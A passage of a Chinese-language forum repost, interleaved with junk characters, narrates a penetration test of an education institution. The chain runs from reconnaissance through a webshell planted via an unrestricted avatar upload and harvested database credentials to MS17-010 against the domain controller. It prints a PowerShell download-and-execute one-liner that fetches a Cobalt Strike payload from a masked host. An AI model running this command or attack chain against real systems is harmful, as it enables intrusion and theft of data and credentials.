|
4 A% U2 m1 g Q0 B6 J! w' u6 Y1 _ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
B4 `3 s$ ~( H1 J & t7 o3 x& J9 w2 ~
6 k0 ?9 k$ |( {/ N, c4 R' B
$ _% s4 U0 E7 B" p 3 |& W- g8 ^9 c! s# g; {# i
, I3 B6 m b: j0 U
正文
^. c5 V( i- R; J! W+ \ ' C5 T4 [) L5 e5 t3 H( Z- K
$ K) i& c, I7 F* m) a ! ]9 |: [9 S+ F1 U+ W1 N
6 R: @/ S8 ~5 Z w, \" H
% i3 P9 {) L- ] o- O5 d
目标:www.xxxx.com(一家教育机构)
2 H, @: U% C1 y/ g0 m% U! Q8 i打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能7 D# N# u# ~4 t3 `
& \' T( g( y! ]
, U0 ~7 n3 F* R0 u0 D2 u" [ 
8 m" B- H: D/ [& J2 |) u0 e! _2 j
2 S( a4 L( k8 W1 f7 v% Q% P' \% P3 M7 g- c3 ]( P
进行了简单的信息搜集
& L2 ]7 Q$ B4 r. T# `6 F
$ G; s6 j- I4 {- u
% d! E1 C( K2 [2 h, p/ l. W
E) B1 m- G$ |4 a, ^5 o$ G* P% K2 A8 v" g# i3 |0 [. _& D
子域名搜集
$ L: Y4 e5 f5 `* ~" F' x/ `
% g: ?+ c$ v. ]. Z. f% @& K, o0 L! `) r* H* W
 ; `7 Q- R2 M7 L7 i7 ?7 P1 g) @3 x4 K5 u
/ _. W0 n2 u2 k/ \: c' u
3 `; M! O3 i/ W fofa找资产
& z! J8 W3 |2 t6 D7 j6 `
- g. c4 b6 l$ | Z. x- q. S- j* }- J
2 [6 x+ X( G" f4 M, u' V w( f; a. k7 g : E+ s. A: s9 o, P- C# Q
$ m$ g8 ]# M0 n  $ x" I4 T' `( S: ?
. R( q% Q8 _" o( X5 c5 g
# J, Y, L. d J& t 一共七个资产。去重之后只有两个。
6 ~ t9 [) f$ `! d9 s4 w' G. t
. g# [' J- V9 I6 y( X5 H# A/ R# W
1 B2 k! s9 H- V U
5 S) k5 t a& g* [* J( l: O4 l
目录探测& J9 f. ~: c* k$ ^) ?$ c" Z/ \
2 g7 ~- q; o; _% J; c4 ~4 m. m, b0 L4 l: _- z: R
 $ f& p7 j/ M# e) K T) M
8 p1 H/ V4 ^) \/ m T/ B3 I
# s. Y+ e* G; a
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- q$ F: f: B. }4 R: B
. E+ a+ ^6 Z/ i3 i! R) n W- o3 A. x; J d# d7 t t
# u @8 Q( M1 w: U6 q
0 ]% ~ I0 s$ I0 s6 K 我又尝试了通过修改返回包来绕过登录界面 k: E* p$ v$ G+ k- a# [4 {) G
# Y" B# ~ s/ R8 ?! U' T! C# W4 O' i' i$ d9 E; m* O5 G3 c X) t
1 p$ t" x; O I% R6 }' X6 _, C# R 7 C3 O8 ?4 c2 z+ Z! Z
) t8 u& I0 k: H0 j+ h
还是不行,尝试注入无果& n- C. j( n, v6 X4 p
+ z2 P5 ]$ B, p3 Y8 ]
6 _3 L& v8 a% Z; C) _
; v& x- @4 U# e6 q+ K7 H ! a/ l: [0 O, b1 g
) u1 T' k5 P+ ~3 F) m+ W 不过我目录探测出了一处Spring信息泄露
4 K$ A8 A) g& X
, H7 t0 B! i! f% s: N- P
% z# a/ Y% ^" g. U9 G N! |* K# d. \, J
% F2 p& T5 }' t } t
7 M$ z& r( G1 N1 ~6 _8 }2 X( w* N 8 t2 |) j: m! h/ a
" u& T6 J2 W6 N; a
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
) O; G, m9 W: r) N ' A; |6 V9 H0 d( a: e: d
+ `0 m" O# O# G$ ~4 `! Z/ j 
' D1 {+ j6 } e" i
" p0 n) M& B$ C0 I9 f4 I
5 n& g2 Z! W# p7 k 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
% o" |/ z, W; i* e: E& M
; ?" A$ n4 j7 C% l% b, A
$ Q# }/ l$ J' s' m/ W8 ?/ O0 ^7 H  / C. @! V; P; Q! d! b3 L2 [* _
! Z3 m" j/ c9 M! U V, o2 C+ [ Q2 N
2 H0 n/ T+ [( w# G4 B' H0 N 获取有些师傅到这一步就手机抓包电脑测了。- g0 x; g7 F) w( L- P
/ r, f, h/ v) R# ~9 T! J( A* X3 O: D& w9 Z8 Y! D; N% ?1 {" _% N$ f4 V
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 `# O; E: {% h9 m1 b6 V) U. f
: _1 ]3 p2 N2 c, n% Y7 Z1 i* x
# ~; V& ]7 m6 ^+ X# K 其中在一个公众号发现了小程序,可以进行注册。5 U0 I+ b; s7 y9 E
% ]0 o' G! p0 J5 @% b3 V4 A
6 H: W7 M0 z: L7 }. ~4 ^ 看到了头像上传,尝试上传获取WebShell0 j z4 M4 f9 k# U: ]; ?
9 ?7 P8 U6 X3 p3 Y/ ^9 E4 e O9 f) j5 p* H6 _9 r- X
 $ Z) P2 u; Q! {/ a( X
) d' R% j3 b8 g# g
3 D# Z9 {5 E, r( D, y 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问8 X) d b, m4 z# o3 M
0 U$ E9 L- s. J' O
% I$ Z* r& P" G+ z
 / k, \2 b5 N6 Q0 F& ?
- X1 E$ M. v+ C) ^" z' q
; o" f8 \- @; P0 H 然后上了大马
: z: `& _& a0 p
- t; N5 y1 V" P! K' u+ \
2 D% I3 }& }7 x6 t6 n" h C0 I  ! Y) `, V- K* M) r9 u
' Q9 u6 ]" l, `# n8 @
7 x$ S& @. Y( \  3 i' h1 ^0 Z) m, f% m
1 `% V7 Y5 }5 d/ g3 j: Y. q& W& r; s% J9 z7 r4 ]) c
通过翻找文件发现数据库账号密码# Z& E5 L2 Z( O# S \
( L, a& I9 Y3 b3 U. l9 x! d7 m
! }! F3 r. B# c6 A+ X0 b! l 
+ ?9 J( V( ^7 {1 ?0 E( S + P$ t* c s' _* J5 X$ A
1 d2 [( K$ j( d: [ --内网渗透, F9 u9 C% q/ U
3 p; D9 W1 O. A+ {. ]7 N# r) s/ e# h2 S$ t6 V
直接通过powershell执行 cs上线6 E% j1 U0 C' w T) {
$ O3 x1 J( \; D7 a, w3 j/ y
9 x2 V Q3 O6 Z$ j powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"0 m4 L6 J3 F, q! g6 _
`2 y$ L, H5 b! Y' G) Z$ l# `- X2 q9 V5 J& p5 p! U- ^1 G6 F3 [2 n
' P2 G, x9 O o7 H/ R m * I3 e4 T* F& @# u" d" y; U0 V
1 p, u/ `# k* n$ x7 y 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破4 U: v. E, L5 o5 T) T; F' e0 o
' M; r% h" `) y9 B. \4 `+ H/ U2 E9 a# p' c+ X
 / g. ?6 B$ D" I! M/ J2 d4 x+ f
$ B9 ~& C' ~/ Z( S! I+ ]" k4 C2 j; p
, j; X) V3 q, L# b' h- A" ]- d0 Z 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
" d/ {5 k1 [3 ]% { B" O
3 I7 }4 ]" H6 r; P3 Y; n
# i! W1 G! O1 {$ A( b5 L$ l
( v! D; x* ]/ _ # h* J* h* }; k* h
& m$ ~8 Y+ J, }: e7 ? 
9 H4 c! u9 N4 c+ N& r9 ]7 c0 S
, k8 }, z$ Y$ N' v! R: y% ^0 ?- ~) Z# m* O/ u9 D
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- |" b# _" \& K$ }
7 P0 Y1 N! y8 r$ \. t! D4 I: L: [' O) K
# _7 K' W& p% N! a4 ? S! S* b" i- _2 J V$ [& ~# v
7 l1 i$ i0 G) R8 a  - Q& V$ l0 e* }0 f
4 u; u: @( z' D I. x
/ E) E7 I* F) B6 C
4 G0 B O, K( [4 U% Z
# o- i' R% Z, P5 g( O8 T3 o' V7 X$ [5 W6 \) G2 Z1 O6 X! r ]
2 `( e1 H! d9 {, ]
5 {: [# r& h; U( v: l2 q% |( z+ l6 m
0 g2 `3 J* S9 @- S/ V/ e: G
8 d0 v2 @; R* L: O- _9 |
4 x3 a$ [, i! E( x 小结
9 R& A( M% e$ U 3 k9 ]% o2 u" W8 K* L% P
7 c% _4 `6 k% } h
7 W: K2 u! g7 q; A4 L: [; `
9 ^. p7 o" c" ?* s. v1 z/ Q
# ?8 K- f( S4 o1 F1 m
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!) E: d. a. f& Z. K ^& Z* s* N# A
, [ W. j1 A/ }7 X
@4 \% q( ~: U& ^! c* z' @ x7 z
& w7 p* n# B } % p3 V4 v) R1 [; R
5 S. v' [1 e( A - : X; Y" w( {& w5 ^: w* g
) U+ P& E# ?9 i
. U- }# ~, u: L) s% T. L
- ! R1 U" g8 g: S2 C* i' p- x
% b5 A; q, b: ?, o8 }' E! q
2 k8 P$ i; A4 k6 L& F# V
% p' R" J- k0 ^9 j: c7 v
p* P, i1 O6 K8 d& P8 l) m
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
- S+ Q/ p6 E2 Z9 f5 E - [. B* o1 A' h% l
+ }4 i3 S% u/ t: v6 D ( Z1 [/ H1 x f7 R. e( O
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对